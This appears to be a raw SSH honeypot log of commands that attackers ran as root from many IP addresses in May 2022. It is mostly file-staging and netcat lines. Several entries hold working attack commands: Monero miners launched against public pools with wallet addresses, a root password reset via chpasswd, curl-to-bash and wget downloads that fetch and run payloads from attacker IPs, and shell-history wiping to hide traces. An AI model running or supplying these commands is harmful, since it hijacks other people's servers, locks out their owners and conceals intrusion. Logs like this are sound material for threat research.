bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX

From 124.223.208.121 18-May-2022 04:03:02 ssh2 root
apt install -y zmap || yum install -y zmap || dnf install -y zmap

From 222.134.240.92 18-May-2022 04:03:10 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
apt install -y screen || yum install -y screen || dnf install -y screen
screen -S 'auto' ./loop

From 173.19.149.215 18-May-2022 04:31:52 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 185.135.232.174 18-May-2022 04:34:01 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 150.107.95.20 18-May-2022 05:26:53 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 104.152.244.81 18-May-2022 05:29:10 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 104.152.244.81 18-May-2022 05:29:21 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 2.197.115.147 18-May-2022 05:40:05 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 13.87.67.199 18-May-2022 05:45:49 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 81.38.12.60 18-May-2022 05:58:13 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig

From 124.126.137.38 18-May-2022 05:58:13 ssh2 root
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 31.223.111.253 18-May-2022 06:04:46 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 64.98.86.50 18-May-2022 06:06:22 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 150.107.95.20 18-May-2022 06:19:15 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 210.73.221.78 18-May-2022 06:20:10 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 112.167.233.14 18-May-2022 06:21:07 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 121.200.53.148 18-May-2022 06:25:29 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 115.45.64.175 18-May-2022 06:29:38 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 143.244.138.59 18-May-2022 06:29:44 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 39.175.68.100 18-May-2022 06:29:52 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 143.244.138.59 18-May-2022 06:29:59 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 85.105.58.118 18-May-2022 06:30:29 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 1.220.98.197 18-May-2022 06:32:51 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 59.3.186.45 18-May-2022 06:38:55 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 124.223.208.121 18-May-2022 06:39:06 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 64.98.86.50 18-May-2022 06:40:05 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 222.134.240.92 18-May-2022 06:44:00 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 222.134.240.92 18-May-2022 06:45:01 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 38.75.229.170 18-May-2022 06:48:44 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 120.224.34.31 18-May-2022 06:51:06 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 222.187.196.26 18-May-2022 07:21:01 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 144.24.197.160 18-May-2022 07:25:01 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 103.105.12.48 18-May-2022 08:00:41 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 117.16.44.111 18-May-2022 08:27:08 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 171.231.23.168 18-May-2022 08:37:40 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 179.43.142.180 18-May-2022 23:48:02 ssh2 root
Exec echo root:dgtij24jti3u3ji4rg69420g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij24jti3u3ji4rg69420g|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 209.141.62.223 19-May-2022 13:00:02 ssh2 root
Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.62.223/krn.tar || curl -o krn.tar http://209.141.62.223/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456
cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.62.223/krn.tar || curl -o krn.tar http://209.141.62.223/krn.tar
tar -xf krn.tar
cd krn
chmod +x *
./sshd
./krane 123456

From 139.99.131.116 19-May-2022 13:38:00 ssh2 root
Exec d /tmp ; rm -rf ok.sh wget 156.38.209.136/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 156.38.209.136/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 156.38.209.136/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history
d /tmp
rm -rf ok.sh wget 156.38.209.136/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 156.38.209.136/ok.sh
sh ok.sh
rm -rf ok.sh
history -c
wget 156.38.209.136/cnrig
chmod 777 cnrig
./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B
history -c
cat /dev/null > ~/.bash_history
history -c
rm -rf /root/.bash_history

From 157.230.19.122 19-May-2022 14:09:05 ssh2 root
Exec nproc;nvidia-smi --list-gpus
nproc
nvidia-smi --list-gpus

From 62.197.136.83 19-May-2022 23:57:22 ssh2 root
Exec wget 45.61.184.4/x86_64; chmod 777 x86_64; ./x86_64 wns.x86
wget 45.61.184.4/x86_64
chmod 777 x86_64
./x86_64 wns.x86

From 179.43.142.180 20-May-2022 18:14:01 ssh2 root
